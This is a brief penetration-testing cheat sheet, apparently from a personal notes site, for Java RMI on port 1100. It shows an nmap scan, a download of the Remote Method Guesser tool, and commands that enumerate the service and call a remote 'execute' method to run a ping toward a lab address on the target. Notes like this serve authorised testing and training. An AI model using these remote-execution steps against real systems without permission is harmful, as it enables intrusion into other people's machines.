Skip to content

1100 - Pentesting mssql rmi java

nmap

nmap -p 1100 -Pn -sC -sV $IP
1100/tcp  open  java-rmi     Java RMI

Remote Method Guesser

wget https://github.com/qtc-de/remote-method-guesser/releases/download/v4.3.1/rmg-4.3.1-jar-with-dependencies.jar -O /opt/tools/rmg.jar

java -jar rmg.jar enum $IP 1100
java -jar rmg.jar call $IP 1100 '"ping -c 10 192.168.119.199"' --signature 'String execute(String cmd)' --bound-name plain-server